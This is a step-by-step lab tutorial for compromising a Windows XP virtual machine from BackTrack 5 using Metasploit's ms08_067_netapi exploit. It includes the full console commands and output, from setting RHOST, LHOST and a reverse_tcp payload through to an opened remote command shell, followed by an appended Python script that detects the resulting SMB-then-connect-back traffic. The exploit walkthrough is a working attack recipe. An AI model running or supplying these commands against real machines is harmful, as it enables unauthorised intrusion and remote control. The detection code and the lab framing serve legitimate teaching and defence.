
BACKTRACK 5

LEARN TO CONFIGURE AND RUN COMMANDS TO PENETRATE AN XP MACHINE

FIRSTLY
DOWNLOAD BACKTRACK IN VMX FORMAT FROM http://www.backtrack-linux.org/downloads/

SECONDLY.
Run VMWARE and load xp machine and the backtrack vmx machine.
In this VM lab, the XP machine terminal is attacked by the BT terminal.

THIRDLY. Configure the IP address of the BT machine

Here the IP configured is 80.0.2.251

FOURTHLY. Configure the IP address of the XP machine

Here the IP configured is 80.0.2.252

FIFTHLY.
NOW, JUST TO MAKE A SMALL CHECK OF THE CONNECTIONS, DO THE BRIDGING AND PING BOTH MACHINES FROM BOTH TERMINALS.

SIXTHLY. Run the following on the BT terminal


root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole
[metasploit ASCII-art banner]

       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12536 updated 169 days ago (2011.05.04)

Warning: This copy of the Metasploit Framework was last updated 169 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

RED DENOTES THE COMMANDS TO BE TYPED. minimal!!!!

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 80.0.2.252
RHOST => 80.0.2.252
msf exploit(ms08_067_netapi) > set LHOST 80.0.2.251
LHOST => 80.0.2.251
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 80.0.2.251:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 80.0.2.252
[*] Command shell session 1 opened (80.0.2.251:4444 -> 80.0.2.252:1133) at 2011-10-20 05:15:55 -0400

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>

u r done!!!!!!!!!!!!!!!!!!
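Seen from the network, the session above is an inbound SMB connection to the XP machine followed by the XP machine connecting back to the BT machine on port 4444. The following is an added example, not part of the original slides, that flags that pattern in flow records for the lab. The log format, the timestamps, the extra sample lines and the function names are assumptions made for the illustration.

```python
"""Flag an inbound SMB flow that is soon followed by the SMB server
connecting back out to the same peer (the reverse_tcp pattern)."""
from datetime import datetime
import re

# Constructed sample flow records: "timestamp src:port -> dst:port".
# The 80.0.2.251/80.0.2.252 addresses and the 1133 -> 4444 pair come from the
# session output above; every other line and all timestamps are made up.
SAMPLE_LOG = """\
2011-10-20T05:15:40 80.0.2.252:1130 -> 80.0.2.1:53
2011-10-20T05:15:52 80.0.2.251:40211 -> 80.0.2.252:445
2011-10-20T05:15:55 80.0.2.252:1133 -> 80.0.2.251:4444
2011-10-20T05:20:00 80.0.2.250:3391 -> 80.0.2.252:445
2011-10-20T05:31:10 80.0.2.252:1140 -> 80.0.2.250:80
"""

FLOW = re.compile(r"(\S+) ([\d.]+):(\d+) -> ([\d.]+):(\d+)")
SMB_PORTS = {139, 445}

def parse(log):
    """Yield (time, src, sport, dst, dport) for each well-formed line."""
    for line in log.splitlines():
        m = FLOW.fullmatch(line.strip())
        if m:  # lines that do not match the assumed format are skipped
            ts, src, sport, dst, dport = m.groups()
            yield datetime.fromisoformat(ts), src, int(sport), dst, int(dport)

def find_connect_backs(log, window_s=60):
    """Return one alert per flow where an SMB server dials back to a client
    that reached its SMB port at most `window_s` seconds earlier."""
    last_smb = {}  # (client, server) -> time of most recent inbound SMB flow
    alerts = []
    for ts, src, sport, dst, dport in sorted(parse(log)):
        if dport in SMB_PORTS:
            last_smb[(src, dst)] = ts
            continue
        seen = last_smb.get((dst, src))  # did this peer hit our SMB port first?
        if seen is not None and (ts - seen).total_seconds() <= window_s:
            alerts.append({"server": src, "peer": dst, "peer_port": dport,
                           "delay_s": (ts - seen).total_seconds()})
    return alerts

if __name__ == "__main__":
    for alert in find_connect_backs(SAMPLE_LOG):
        print("SMB followed by connect-back:", alert)
```

The check keys on the direction reversal rather than on port 4444, so it still fires if the handler listens on another port.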

Any questions????
please message or mail at anupam@blumail.org